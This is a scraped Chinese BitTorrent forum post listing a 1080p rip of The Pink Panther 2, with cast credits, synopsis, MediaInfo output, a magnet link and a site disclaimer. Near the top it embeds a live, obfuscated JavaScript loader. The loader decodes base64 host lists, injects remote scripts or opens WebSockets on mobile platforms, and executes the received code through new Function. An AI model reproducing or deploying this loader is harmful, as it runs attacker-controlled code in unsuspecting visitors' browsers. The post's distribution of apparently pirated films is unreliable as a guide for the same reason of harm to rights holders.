粉红豹2[双语字幕].The.Pink.Panther.2.2009.1080p.BluRay.DTS.x265-10bit 7.28GB

版主小s 1月前 375

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 粉红豹2 / 粉红豹:2有恶豹
◎片  名 The Pink Panther 2
◎年  代 2009
◎产  地 美国
◎类  别 喜剧 / 悬疑 / 犯罪 / 冒险
◎语  言 英语
◎上映日期 2009-02-06(美国)
◎IMDb链接 https://www.imdb.com/title/tt0838232/
◎豆瓣评分 6.9/10 (18673人评价)
◎豆瓣链接 https://movie.douban.com/subject/2133413/
◎片  长 92 分钟
◎导  演 哈罗德·兹瓦特 Harald Zwart (id:1009280)
◎编  剧 斯科特·纽斯塔德 Scott Neustadter (id:1310745)
       迈克尔·H·韦伯 Michael H. Weber (id:1310744)
       史蒂夫·马丁 Steve Martin (id:1022595)
       莫里斯·里奇林 Maurice Richlin (id:1033730)
       布莱克·爱德华兹 Blake Edwards (id:1025287)
◎演  员 史蒂夫·马丁 Steve Martin (id:1022595)
       让·雷诺 Jean Reno (id:1025182)
       艾米莉·莫迪默 Emily Mortimer (id:1036322)
       安迪·加西亚 Andy Garcia (id:1002695)
       阿尔弗雷德·莫里纳 Alfred Molina (id:1017897)
       松崎悠希 Yuki Matsuzaki (id:1027376)
       艾西瓦娅·雷 Aishwarya Rai (id:1140475)
       迈克·温特 Mike Wendt (id:1251310)
        Steve Scarfo (id:1239227)
        Kate Jurdi (id:1270040)
       哈里·范·戈库姆 Harry Van Gorkum (id:1276202)
       克里斯汀·阿曼普 Christiane Amanpour (id:1059289)
        Richard DeAgazio (id:1238809)
        Adam Zalt (id:1235834)
       莉莉·汤姆林 Lily Tomlin (id:1049728)
       约翰·克里斯 John Cleese (id:1041137)
       杰瑞米·艾恩斯 Jeremy Irons (id:1031216)
       约翰尼·哈里戴 Johnny Hallyday (id:1018266)
       Chemi Che-Mponda Chemi Che-Mponda (id:1067920)
       费德里克·卡斯特鲁西奥 Federico Castelluccio (id:1071303)
        Tarek Moussa (id:1234316)
        Giovanni Pantaleo (id:1234198)
        Jaime De La Rosa (id:1227419)
        Kimmie Johnson (id:1227115)
       莎伦泰 Sharon Tay (id:1150828)
       杰弗里·帕尔默 Geoffrey Palmer (id:1134599)
       埃夫吉恩尼·拉扎雷夫 Evgeniy Lazarev (id:1103513)
       肖恩·利维 Shawn Levy (id:1289935)
       克里斯托弗·贝克 Christophe Beck (id:1278180)
       Julia Wong Julia Wong (id:1301198)
       Ilene Starger Ilene Starger (id:1298269)
       Rusty Smith Rusty Smith (id:1297939)
       Joseph G. Aulisi Joseph G. Aulisi (id:1277584)
       Jeni Zaharian Jeni Zaharian (id:1166773)
       Sherryn Smith Sherryn Smith (id:1123679)
       Marlene D. Williams Marlene D. Williams (id:1300979)
       道格拉斯·诺亚 Douglas Noe (id:1293238)
       恩尼克·福希尔 Yannick Fauchier (id:1180098)
        Cedric Dosne (id:1239088)
        Matthieu Charter (id:1225248)
        Jaehyun Yoo (id:1252637)
       克里斯·戴尔·康特 Chris Del Conte (id:1282169)
       Sébastien Gagné Sébastien Gagné (id:1188477)
       Lori C. Miller Lori C. Miller (id:1193945)
       菲·陈 Phi Tran (id:1309487)
       安德鲁·罗伯茨 Andrew Roberts (id:1223036)

◎标  签 喜剧 / 法国 / 美国 / 粉红豹 / 美国电影 / 2009 / JeanReno / 粉红豹2

◎简  介
  自从三年前闹得整个巴黎鸡飞狗跳之后,探员杰奎斯·克鲁索(史蒂夫·马丁 Steve Martin 饰)日常工作就是街边检查一下违规停放的车辆,但还是屡屡搞砸,几番折腾,他终于做出了最后决定:告别法国!突然世界各地,价值连城的文物一一失窃,而"粉红豹"钻戒也失窃了。顶头上司指名点姓,一定要勇破上回"粉红豹"疑案的克鲁索,总督察雷福斯(凯文·克莱恩 Kevin Kline 饰)只好召回这个让人头疼的探长。                                       
                                    于是老搭档波顿(让·雷诺 Jean Reno 饰)、女秘书妮可(艾米莉·莫迪默 Emily Mortimer 饰)都被顺利召回,老队伍回来了,新一轮的摧毁行动也正式宣告开始。凡克鲁索所到之处,无不如台风过境般催枯拉朽,而在结识了漂亮的桑妮娅(艾西瓦娅·雷 Aishwarya Rai 饰)后,他更是照旧神魂颠倒、手足无措、笑话百出。这一次他还能顺利完成任务...

◎获奖情况 (共2项)
  第30届金酸莓奖 (2010)
  最差男主角(提名)
   └──史蒂夫·马丁 (id:1022595)
  最差前传、重拍、恶搞及续集电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 57974101592780940293015831867349549140 (0x2B9D67E4308FFEDE56D5061232744054)

  4. Complete name                            : [email protected].COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.28 GiB

  8. Duration                                 : 1 h 32 min

  9. Overall bit rate                         : 11.3 Mb/s

  10. Movie name                               : The Pink Panther 2 2009 1080p BluRay DTS [email protected]

  11. Encoded date                             : UTC 2021-08-26 03:20:27

  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 32 min

  21. Bit rate                                 : 9 724 kb/s

  22. Width                                    : 1 916 pixels

  23. Height                                   : 1 040 pixels

  24. Display aspect ratio                     : 1.85:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.204

  31. Stream size                              : 6.25 GiB (86%)

  32. Title                                    : @HDSky

  33. Writing library                          : x265 - H.265/HEVC codec

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. Format                                   : DTS

  39. Format/Info                              : Digital Theater Systems

  40. Codec ID                                 : A_DTS

  41. Duration                                 : 1 h 32 min

  42. Bit rate mode                            : Constant

  43. Bit rate                                 : 1 509 kb/s

  44. Channel(s)                               : 6 channels

  45. Channel layout                           : C L R Ls Rs LFE

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 93.750 FPS (512 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossy

  50. Stream size                              : 993 MiB (13%)

  51. Title                                    : English

  52. Language                                 : English

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Text #1

  56. ID                                       : 3

  57. Format                                   : PGS

  58. Muxing mode                              : zlib

  59. Codec ID                                 : S_HDMV/PGS

  60. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration                                 : 1 h 26 min

  62. Bit rate                                 : 39.9 kb/s

  63. Count of elements                        : 1958

  64. Stream size                              : 24.7 MiB (0%)

  65. Title                                    : ENG

  66. Language                                 : English

  67. Default                                  : Yes

  68. Forced                                   : No


  69. Text #2

  70. ID                                       : 4

  71. Format                                   : PGS

  72. Muxing mode                              : zlib

  73. Codec ID                                 : S_HDMV/PGS

  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration                                 : 1 h 26 min

  76. Bit rate                                 : 41.3 kb/s

  77. Count of elements                        : 1865

  78. Stream size                              : 25.5 MiB (0%)

  79. Title                                    : CHS

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No


  83. Text #3

  84. ID                                       : 5

  85. Format                                   : PGS

  86. Muxing mode                              : zlib

  87. Codec ID                                 : S_HDMV/PGS

  88. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration                                 : 1 h 26 min

  90. Bit rate                                 : 42.5 kb/s

  91. Count of elements                        : 1865

  92. Stream size                              : 26.3 MiB (0%)

  93. Title                                    : CHT

  94. Language                                 : Chinese

  95. Default                                  : No

  96. Forced                                   : No


  97. Text #4

  98. ID                                       : 6

  99. Format                                   : PGS

  100. Muxing mode                              : zlib

  101. Codec ID                                 : S_HDMV/PGS

  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration                                 : 1 h 26 min

  104. Bit rate                                 : 49.3 kb/s

  105. Count of elements                        : 1865

  106. Stream size                              : 30.5 MiB (0%)

  107. Title                                    : CHS&ENG

  108. Language                                 : Chinese

  109. Default                                  : No

  110. Forced                                   : No


  111. Text #5

  112. ID                                       : 7

  113. Format                                   : PGS

  114. Muxing mode                              : zlib

  115. Codec ID                                 : S_HDMV/PGS

  116. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration                                 : 1 h 26 min

  118. Bit rate                                 : 50.6 kb/s

  119. Count of elements                        : 1865

  120. Stream size                              : 31.3 MiB (0%)

  121. Title                                    : CHT&ENG

  122. Language                                 : Chinese

  123. Default                                  : No

  124. Forced                                   : No


  125. Menu

  126. 00:00:00.000                             : en:Chapter 01

  127. 00:03:19.282                             : en:Chapter 02

  128. 00:04:48.747                             : en:Chapter 03

  129. 00:07:45.090                             : en:Chapter 04

  130. 00:12:14.275                             : en:Chapter 05

  131. 00:15:54.370                             : en:Chapter 06

  132. 00:19:09.690                             : en:Chapter 07

  133. 00:24:00.773                             : en:Chapter 08

  134. 00:25:32.656                             : en:Chapter 09

  135. 00:27:21.974                             : en:Chapter 10

  136. 00:29:34.856                             : en:Chapter 11

  137. 00:30:41.381                             : en:Chapter 12

  138. 00:32:53.889                             : en:Chapter 13

  139. 00:36:31.564                             : en:Chapter 14

  140. 00:38:24.302                             : en:Chapter 15

  141. 00:43:45.331                             : en:Chapter 16

  142. 00:49:08.654                             : en:Chapter 17

  143. 00:53:32.626                             : en:Chapter 18

  144. 00:55:27.991                             : en:Chapter 19

  145. 00:59:09.254                             : en:Chapter 20

  146. 01:01:54.920                             : en:Chapter 21

  147. 01:06:15.722                             : en:Chapter 22

  148. 01:09:51.729                             : en:Chapter 23

  149. 01:12:57.999                             : en:Chapter 24

  150. 01:16:40.262                             : en:Chapter 25

  151. 01:20:03.882                             : en:Chapter 26

  152. 01:23:34.843                             : en:Chapter 27

  153. 01:27:30.245                             : en:Chapter 28



TAGS 冒险 悬疑 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:0D231CBE86BAE37929C5C1CA8DBE4FFA6753E8A2
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回